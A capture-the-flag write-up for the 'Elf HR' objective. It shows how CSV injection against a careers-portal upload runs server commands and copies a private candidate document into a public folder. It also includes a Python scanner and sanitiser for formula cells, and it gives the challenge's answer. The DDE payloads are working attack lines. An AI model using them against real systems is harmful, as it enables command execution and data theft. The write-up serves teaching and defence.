HR Incident Response

Objective #7
Elf HR logo

Santa uses an Elf Resources website to look for talented information security professionals. Gain access to the website and fetch the document C:\candidate_evaluation.docx. Which terrorist organization is secretly supported by the job applicant whose name begins with "K"?

For hints on achieving this objective, please visit Sparkle Redberry and help her with the Dev Ops Fail Cranberry Pi terminal challenge.

Sparkle Redberry

CSV Injection Talk hint from Sparkle Redberry
Somehow Brian Hostetler is giving a talk on CSV injection WHILE he's giving a talk on Trufflehog. Whatta' guy!


OWASP on CSV Injection hint from Sparkle Redberry
OWASP CSV Injection Page


I wonder if Tangle Coalbox has taken a good look at his own employee import system.
It takes CSV files as imports. That certainly can expedite a process, but there's danger to be had.
I'll bet, with the right malicious input, some naughty actor could exploit a vulnerability there.
I'm sure the danger can be mitigated. OWASP has guidance on what not to allow with such uploads.

Opening Elf HR presents an opportunity to upload a CSV file.

initial Elf HR web page

Opening a non-existent URL, e.g. https://careers.kringlecastle.com/elfelfelf, returns a 404 error page that discloses information about file locations on the server (the application's public directory under C:\careerportal\resources\public\ is served at /public/).

404 error on Elf HR web page

Combining these two things, let's try a simple CSV injection to execute a command.

=cmd|'/C DIR C:\ C:\careerportal\resources\public\temp.txt'!A1

Navigating to https://careers.kringlecastle.com/public/temp.txt reveals that it worked!

    Directory: C:\


Mode                LastWriteTime         Length Name
----                -------------         ------ ----
d-----        12/6/2018   7:42 PM                careerportal
d-----        10/9/2018   7:42 PM                PerfLogs
d-r---       10/23/2018   6:26 PM                Program Files
d-----       10/23/2018   5:33 PM                Program Files (x86)
da----       10/23/2018   6:08 PM                Python27
d-r---       10/23/2018   7:06 PM                Users
d-----       12/13/2018   4:20 AM                Windows
-a----        12/7/2018   7:57 PM         363073 candidate_evaluation.docx

Exfiltrate C:\candidate_evaluation.docx by copying it into the publicly accessible directory.

=cmd|'/C COPY C:\candidate_evaluation.docx C:\careerportal\resources\public\'!A1

Now it can be downloaded just by browsing to https://careers.kringlecastle.com/public/candidate_evaluation.docx.
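The root cause on the Elf HR side is that uploaded CSV cells are handed to a spreadsheet unchanged, so a cell beginning with `=` (or `+`, `-`, `@`, tab, carriage return) is evaluated as a formula and the DDE `cmd|...` form runs a command. The OWASP guidance Sparkle points to is to treat such cells as data: scan for them on upload and neutralize them by prefixing a single quote, quoting every field and doubling embedded quotes. The following is an added example, not code from the challenge or the Kringle Castle portal; the sample CSV, the candidate names and the functions `scan_csv` and `sanitize_csv` are constructed for this illustration and reuse only the payload shape shown above.

```python
import csv
import io

# Leading characters that make Excel/LibreOffice treat a cell as a formula
# (per the OWASP CSV Injection page). Tab and CR are included because some
# spreadsheets strip them and then evaluate what follows.
FORMULA_TRIGGERS = ("=", "+", "-", "@", "\t", "\r")

# The payload form used against Elf HR above; a raw string keeps the backslashes literal.
PAYLOAD = r"=cmd|'/C DIR C:\ C:\careerportal\resources\public\temp.txt'!A1"

# Constructed sample upload: two benign rows and two rows carrying formula cells.
SAMPLE_ROWS = [
    ["name", "role", "notes"],
    ["Alice", "Analyst", "Hardened legacy attack vectors"],
    ["Mallory", "Red Team", PAYLOAD],
    ["Bob", "Intern", "@SUM(1+1)"],
]
SAMPLE_CSV = "\n".join(",".join(row) for row in SAMPLE_ROWS) + "\n"


def parse_rows(text):
    """Parse CSV text into a list of rows using the standard library parser."""
    return list(csv.reader(io.StringIO(text)))


def is_formula_cell(value):
    """True if a spreadsheet would interpret this cell as a formula rather than text."""
    return value.startswith(FORMULA_TRIGGERS)


def scan_csv(text):
    """Detection: return (row_index, col_index, value) for every formula-like cell.

    Suitable for logging or for rejecting the upload outright. Note that
    legitimate negative numbers such as "-42" also match and need allow-listing
    if the import format carries numeric columns.
    """
    findings = []
    for r, row in enumerate(parse_rows(text)):
        for c, cell in enumerate(row):
            if is_formula_cell(cell):
                findings.append((r, c, cell))
    return findings


def neutralize_cell(value):
    """Mitigation: prefix formula-like cells with a single quote so the
    spreadsheet displays them as literal text instead of evaluating them."""
    if is_formula_cell(value):
        return "'" + value
    return value


def sanitize_csv(text):
    """Rewrite the CSV so no cell can be evaluated: neutralize trigger characters,
    wrap every field in double quotes and let csv.writer double any embedded
    quotes, which is the OWASP-recommended combination."""
    out = io.StringIO()
    writer = csv.writer(out, quoting=csv.QUOTE_ALL, lineterminator="\n")
    for row in parse_rows(text):
        writer.writerow([neutralize_cell(cell) for cell in row])
    return out.getvalue()


if __name__ == "__main__":
    for r, c, value in scan_csv(SAMPLE_CSV):
        print(f"formula cell at row {r}, column {c}: {value!r}")
    print("--- sanitized ---")
    print(sanitize_csv(SAMPLE_CSV), end="")
```

Running the block reports the two formula cells in rows 2 and 3 and prints the sanitized file; scanning the sanitized output again returns nothing, since every dangerous cell now begins with a quote. An import system that only ever needs plain names and roles is better off rejecting on any finding from `scan_csv` than silently rewriting the data.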

In the candidate_evaluation.docx document there is a comment about the candidate Krampus:

Krampus’s career summary included experience hardening decade old attack vectors, and lacked updated skills to meet the challenges of attacks against our beloved Holidays. Furthermore, there is intelligence from the North Pole this elf is linked to cyber terrorist organization Fancy Beaver who openly provides technical support to the villains that attacked our Holidays last year. We owe it to Santa to find, recruit, and put forward trusted candidates with the right skills and ethical character to meet the challenges that threaten our joyous season.

The answer to this objective is Fancy Beaver.